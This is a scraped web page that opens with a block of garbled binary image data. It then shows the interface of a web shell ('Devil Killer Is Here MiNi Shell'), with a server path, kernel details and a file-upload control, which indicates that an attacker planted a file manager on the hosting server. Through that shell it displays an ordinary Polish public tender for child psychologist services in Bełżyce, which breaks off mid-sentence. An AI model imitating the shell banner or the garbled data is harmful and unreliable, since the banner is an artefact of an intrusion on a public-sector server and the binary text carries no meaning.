JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250515/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250515/0023193401-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług związanych z organizacją i prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka w ramach programu kompleksowego wsparcia dla rodzin „Za życiem” – zajęcia z psychologiem </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Poradnia Psychologiczno-Pedagogiczna w Bełżycach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 060710918</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Fabryczna 2b</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bełżyce</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">24-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ppp.belzyce@powiat.lublin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://poradnia-belzyce.szkolnastrona.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług związanych z organizacją i prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka w ramach programu kompleksowego wsparcia dla rodzin „Za życiem” – zajęcia z psychologiem </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-00a47748-5243-409f-9d70-b9f7d60a2026</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00231934</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00033055/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Zajęcia specjalistyczne z programu &#34;Za Życiem&#34; - zajęcia z psychologiem</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-00a47748-5243-409f-9d70-b9f7d60a2026 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W niniejszym postępowaniu o udzielenie zamówienia publicznego, komunikacja<br/>między zamawiającym a wykonawcami, odbywa się przy użyciu środków komunikacji elektronicznej: za pośrednictwem Platformy e-<br/>Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl lub poczty elektronicznej zazyciem@powiat.lublin.pl<br/>(z wyłączeniem składania ofert).</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Korzystanie z Platformy e-Zamówienia<br/>jest bezpłatne.Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto<br/>podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i<br/>warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. Przeglądanie i pobieranie publicznej treści<br/>dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania. Sposób sporządzenia<br/>dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej<br/>(cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia<br/>2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych<br/>oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz.U. z 2020 poz.<br/>2452).<br/>Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie, sporządza się w postaci elektronicznej, w formatach danych<br/>określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla<br/>systemów teleinformatycznych (Dz.U. z 2017 r. 2247), z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako<br/>załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego<br/>zastosowania. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w<br/>sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz<br/>środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie, przekazywane w<br/>postępowaniu sporządza się w postaci elektronicznej a. w formatach danych określonych w przepisach rozporządzenia Rady<br/>Ministrów w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w<br/>postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (i przekazuje się jako załącznik), lub b. jako<br/>tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości<br/>e-mail lub w treści „Formularza do komunikacji”). Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji<br/>elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993<br/>r. o zwalczaniu nieuczciwej konkurencji (t.j. Dz. U. z 2022 r. poz. 1233) wykonawca, w celu utrzymania w poufności tych informacji,<br/>przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument<br/>stanowiący tajemnicę przedsiębiorstwa”.<br/>- szczegółowe informacje - roz. IX (OGRANICZONE POLE TEKSTOWE)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Przetwarzanie danych osobowych z w związku z przeprowadzeniem postępowania<br/>odbywać się będzie zgodnie z rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (w skrócie „rozporządzenia 2016/679”). Dane osobowe będą przetwarzane w celu:<br/>przeprowadzenia postępowania o udzielenie niniejszego zamówienia, zawarcia umowy w sprawie zamówienia publicznego i jej<br/>realizacji, przechowywania dokumentacji postępowania (protokołu postępowania z załącznikami) na wypadek kontroli prowadzonej<br/>przez uprawnione organy i podmioty, przekazania dokumentacji do archiwum a następnie jej zbrakowania.<br/>2. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 rozporządzenia 2016/679, w celu umożliwienia korzystania ze<br/>środków ochrony prawnej, o których mowa w dziale XXXVI Pzp, do upływu terminu na ich wniesienie. Celem przetwarzania danych<br/>jest prowadzenie postępowania, zawarcie oraz realizacja umowy w sprawie zamówienia publicznego. Odbiorcami danych<br/>osobowych osób fizycznych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania.<br/>3. Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art.<br/>16 rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia ani zmianą postanowień</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą.<br/>4. Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>5. W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje<br/>ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia<br/>zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o<br/>których mowa w art. 18 ust. 2 rozporządzenia 2016/679.<br/>6. Ograniczenia zasady jawności, o których mowa w ust. 3 i art. 18 ust. 3-6 Pzp, stosuje się odpowiednio.<br/>7. W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez zamawiającego, z uprawnienia, o którym<br/>mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, zamawiający może żądać od osoby występującej z żądaniem wskazania<br/>dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>8. Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych<br/>osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu postępowania oraz jego<br/>załączników.<br/>9. W postępowaniu są przetwarzane dane osobowe podlegające ochronie zgodnie z przepisami ustawy z dnia 10 maja 2018 r. o<br/>ochronie danych osobowych (Dz.U. z 2019 r. poz. 1781) oraz rozporządzenia 2016/679. Dane te mogą dotyczyć w szczególności<br/>samego wykonawcy (osoby fizycznej prowadzącej działalność gospodarczą), jego pełnomocnika (osoby fizycznej), jak też informacji<br/>o osobach, które w swojej ofercie wykonawca przedkłada celem wykazania spełniania warunków udziału w postępowaniu, braku<br/>podstaw do wykluczenia z postępowania, jak i potwierdzenia wymogów zamawiającego dotyczących wykonania przedmiotu<br/>zamówienia.<br/>10. W postępowaniu i po zakończeniu postępowania do przetwarzania danych osobowych osób fizycznych stosuje się przepisy ww.<br/>ustawy o ochronie danych osobowych oraz rozporządzenia 2016/679.<br/>11Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679, zamawiający informuje, że:<br/>1) administratorem danych osobowych osób fizycznych jest Zamawiający - Poradnia Psychologiczno-Pedagogiczna w Bełżycach,<br/>szczegółowe informacje roz. XXXVII. (OGRANICZONE POLE TEKSTOWE)</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PBE.ADM.261.19.2025.MG</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja zadań z zakresu administracji rządowej, wynikających z programu kompleksowego<br/>wsparcia dla rodzin &#34;Za życiem&#34;, stanowiącego załącznik do uchwały Nr 189 Rady Ministrów z dnia 27 grudnia 2021 r. w<br/>sprawie programu kompleksowego wsparcia dla rodzin &#34;Za Życiem&#34; (M.P. 2022 poz. 64) zwanego dalej &#34;Programem&#34; w<br/>zakresie realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu lubelskiego,<br/>określonych w art. 90 v ust. 4 ustawy z dnia 7 września 1991 r. o systemie oświaty (Dz. U. z 2024 poz. 750 z poźn. zm.)<br/>oraz Rozporządzeniu Ministra Edukacji i Nauki z dnia 30 sierpnia 2023 r. w sprawie szczegółowych zadań wiodących<br/>ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych (Dz. U. z 2023 poz. 1801) wynikających z zadania 2.4, Priorytet II<br/>Programu: &#34;Wieloaspektowa i kompleksowa pomoc niepełnosprawnemu dziecku w okresie od 0. roku życia do rozpoczęcia<br/>nauki w szkole oraz jego rodzinie&#34; na rzecz osób zakwalifikowanych w zakresie części pn. zajęcia z psychologiem, zgodnie<br/>z opisem zamówienia.<br/>Adresatami Programu są dzieci od 0 roku życia do czasu podjęcia nauki szkolnej,<br/>u których wykryto niepełnosprawność lub zagrożenie niepełnosprawnością.<br/>Realizacja usług może odbywać się w Poradni Psychologiczno – Pedagogicznej<br/>w Bełżycach ul. Fabryczna 2b lub w innym miejscu położonym na terenie powiatu lubelskiego lub miasta Lublina,<br/>ustalonego zgodnie z przepisami Rozporządzenia MEN<br/>z dnia 24 sierpnia 2017 r. w sprawie organizowania wczesnego wspomagania rozwoju dzieci (Dz.U. z 2017 poz. 1635).Zajęcia odbywać się będą zgodnie z ilością godzin przyznanych dziecku, ustalonych przez zespół diagnozujący wybrany<br/>przez Dyrektora Poradni Psychologiczno – Pedagogicznej w Bełżycach ul. Fabryczna 2b, spośród specjalistów<br/>zakwalifikowanych do realizacji programu, według ustalonego harmonogramu zajęć. Termin realizacji usługi określa się do<br/>dnia 15.12.2025 r.<br/>Zamawiający nie zastrzega obowiązku osobistego wykonania przez Wykonawcę prac objętych przedmiotem zamówienia.<br/>Wykonawca może powierzyć realizację części zamówienia podwykonawcy. Pod pojęciem godzina Zamawiający rozumie 60<br/>minut. Zamawiający zaznacza, że pod pojęciem wymiaru godzin świadczenia usług, należy rozumieć wyłącznie rzeczywisty<br/>czas świadczenia usług dla dziecka lub na jego rzecz.<br/>Koszty wynikające z zakresu realizacji przedmiotu zamówienia pokrywa Wykonawca w ramach określonego w ofercie<br/>wynagrodzenia stanowiącego maksymalne zobowiązanie Zamawiającego. Czas pracy poszczególnych specjalistów będzie<br/>ustalony zgodnie z potrzebami psychofizycznymi, rozwojowymi dzieci i ich rodzin. Zamawiający dopuszcza możliwość<br/>zmniejszenia liczby godzin przydzielonych Wykonawcom nie mniejszej niż 50% podstawowej liczby godzin określonej w<br/>umowie. Brak przydzielenia przez Zamawiającego danemu Wykonawcy pełnej liczby godzin określonej w umowie nie<br/>będzie skutkować ze strony Wykonawcy roszczeniem o wykonanie i zapłatę wynagrodzenia za pozostałą liczbę<br/>niezrealizowanych godzin.<br/>Zamówienie obejmuje realizację przedmiotu zamówienia w wymiarze 160 godzin.<br/>Zakres obowiązków psychologa:<br/>• przeprowadzenie diagnozy wstępnej,<br/>• udział w posiedzeniu zespołu konsultacyjnego, o którym mowa w Rozporządzeniu MEN z dnia 24 sierpnia 2017 r. w<br/>sprawie organizowania wczesnego wspomagania rozwoju dzieci( Dz.U. z 2017 poz. 1635),• opracowanie i realizowanie z<br/>dzieckiem i jego rodziną indywidualnego programu wspomagania rozwoju w części przeznaczonej dla psychologa,<br/>• ocenianie postępów oraz trudności w funkcjonowaniu dziecka jeden raz w roku<br/>w zakresie prowadzonych przez siebie zajęć,<br/>• analizowanie skuteczności pomocy udzielanej na podstawie programu dziecku<br/>i jego rodzinie, wprowadzanie zmian w programie stosownie do aktualnych potrzeb dziecka,<br/>• planowanie dalszych działań w zakresie wspomagania rozwoju,<br/>• organizowanie spotkań i konsultacji dla rodziców dziecka, prawnych opiekunów dziecka, opiekunów faktycznych dziecka<br/>(ich liczba nie może przekroczyć 15% ogółu godzin zrealizowanych z danym dzieckiem),<br/>• prowadzenie wymaganej dokumentacji (rekomendacje zespołu konsultacyjnego, dziennika zajęć specjalistycznych, teczki<br/>indywidualnej dziecka),<br/>• opracowanie i złożenie w wymaganym terminie miesięcznego i rocznego sprawozdania z realizacji zajęć.<br/>Ponadto:<br/>a) Ustalenie poziomu funkcjonowania dziecka na podstawie diagnozy zawartej w opinii o potrzebie wczesnego<br/>wspomagania rozwoju dziecka, a w przypadku braku ww. opinii na podstawie indywidualnej, wstępnej diagnozy zgodnie z<br/>posiadanymi kwalifikacjami, w oparciu o informacje o wykryciu zagrożenia niepełnosprawnością lub niepełnosprawności,<br/>kierunku, zakresu i harmonogramu proponowanych działań w zakresie wczesnego wspomagania i wsparcia rodziny dziecka,<br/>lub innych zajęć specjalistycznych uwzględniających rozwijanie aktywności i uczestnictwa dziecka w życiu społecznym oraz<br/>eliminowanie barier i ograniczeń w środowisku utrudniających jego funkcjonowanie;<br/>b) Współpraca z rodziną dziecka w szczególności przez:<br/>- udzielanie pomocy w zakresie kształtowania postaw i zachowań pożądanych<br/>w kontaktach z dzieckiem: wzmacnianie więzi emocjonalnej pomiędzy rodzicami i dzieckiem, rozpoznawanie zachowań<br/>dziecka i utrwalanie właściwych reakcji<br/>na te zachowania,<br/>- udzielanie instruktażu i porad oraz prowadzenie konsultacji w zakresie pracy<br/>z dzieckiem,<br/>c) W przypadku braku opinii o potrzebie wczesnego wspomagania rozwoju dziecka, współpraca z właściwą Poradnią<br/>Psychologiczno-Pedagogiczną oraz udzielenie rodzicom pomocy w celu przeprowadzenia badań i ustalenia specjalistycznej<br/>diagnozy poziomu funkcjonowania dziecka;<br/>d) Opracowanie i realizowanie z dzieckiem i jego rodziną harmonogramu w wymiarze tygodniowym;<br/>e) Realizacja w ramach swoich kwalifikacji innych zadań ośrodka koordynacyjno-rehabilitacyjno- opiekuńczego<br/>wynikających z potrzeb dziecka i jego rodziny, w tym<br/>w szczególności:<br/>• wskazywanie właściwych dla dziecka i jego rodziny innych form specjalistycznej pomocy,<br/>• nawiązywanie współpracy z przedszkolem, inną formą wychowania przedszkolnego, do którego uczęszcza dziecko lub<br/>innymi podmiotami, w których dziecko jest objęte oddziaływaniami terapeutycznymi w celu zapewnienia spójności<br/>wszystkich oddziaływań wspomagających rozwój dziecka;<br/>• nawiązywanie współpracy z podmiotem leczniczym w celu zdiagnozowania potrzeb dziecka wynikających z jego<br/>niepełnosprawności, zapewnienia mu wsparcia medyczno- rehabilitacyjnego i zalecanych wyrobów medycznych oraz porad<br/>i konsultacji dotyczących wspomagania rozwoju dziecka;<br/>• nawiązywanie współpracy z jednostkami organizacyjnymi systemu wspierania rodziny i pieczy zastępczej;<br/>f) Analizowanie skuteczności pomocy udzielanej dziecku i jego rodzinie, wprowadzanie zmian w programie stosownie do<br/>potrzeb dziecka i jego rodziny oraz planowanie dalszych działań.<br/>g) Prowadzenie następującej dokumentacji:<br/>a) indywidualny program, który określa w szczególności:<br/>- sposób realizacji celów rozwojowych ukierunkowanych na poprawę funkcjonowania dziecka, wzmacnianie jego<br/>uczestnictwa w życiu społecznym i przygotowanie do nauki w szkole, eliminowanie barier i ograniczeń w środowiskuutrudniających funkcjonowanie dziecka, w tym jego aktywność i uczestnictwo w życiu społecznym;<br/>- wsparcie rodziny dziecka w realizacji programu;<br/>- sposób oceny postępów dziecka;<br/>b) indywidualną teczkę dziecka, która zawiera:<br/>- zgłoszenie rodzica do programu „Za życiem”;<br/>- kwestionariusz wywiadu z rodzicami;<br/>- wskazania zespołu konsultacyjnego;<br/>- dokumentację medyczną;<br/>- orzeczenia o kształceniu specjalnym, opinię o potrzebie wczesnego wspomagania rozwoju (jeśli dziecko takie posiada);<br/>- dokumentację psychologiczną, pedagogiczną, logopedyczną;<br/>- inne zasadne dokumenty;<br/>c) rejestr poszczególnych zajęć z podpisem rodziców potwierdzających ich realizację;<br/>d) miesięczne i roczne lub w przypadku wcześniejszego zakończenia zajęć, końcowe sprawozdanie z przeprowadzonych<br/>zajęć w terminie do 15 grudnia 2025 r. zawierające w szczególności:<br/>- opis wykonania zadania z wyszczególnieniem zrealizowanych działań;<br/>- rzeczowe, liczbowe i jakościowe efekty zrealizowanych działań.Uzasadnienie zamówienia: Zapewnienie realizacji zadań z zakresu administracji rządowej, wynikających z programu kompleksowego wsparcia dla rodzin &#34;Za życiem&#34;, stanowiącego załącznik do uchwały Nr 189 Rady Ministrów z dnia 27 grudnia 2021 r. w sprawie programu kompleksowego wsparcia dla rodzin &#34;Za Życiem&#34; (M.P. 2022 poz. 64) zwanego dalej &#34;Programem&#34; w zakresie realizacji zadań wiodącego ośrodka koordynacyjno-rehabilitacyjno-opiekuńczego na obszarze powiatu lubelskiego, określonych w art. 90v ust. 4 ustawy z dnia 7 września 1991 r. o systemie oświaty (Dz. U. z 2024 r., poz. 750) oraz Rozporządzeniu Ministra Edukacji i Nauki z dnia 30 sierpnia 2023 r. w sprawie szczegółowych zadań wiodących ośrodków koordynacyjno-rehabilitacyjno-opiekuńczych ( Dz. U. z 2023 poz. 1801) wynikających z zadania 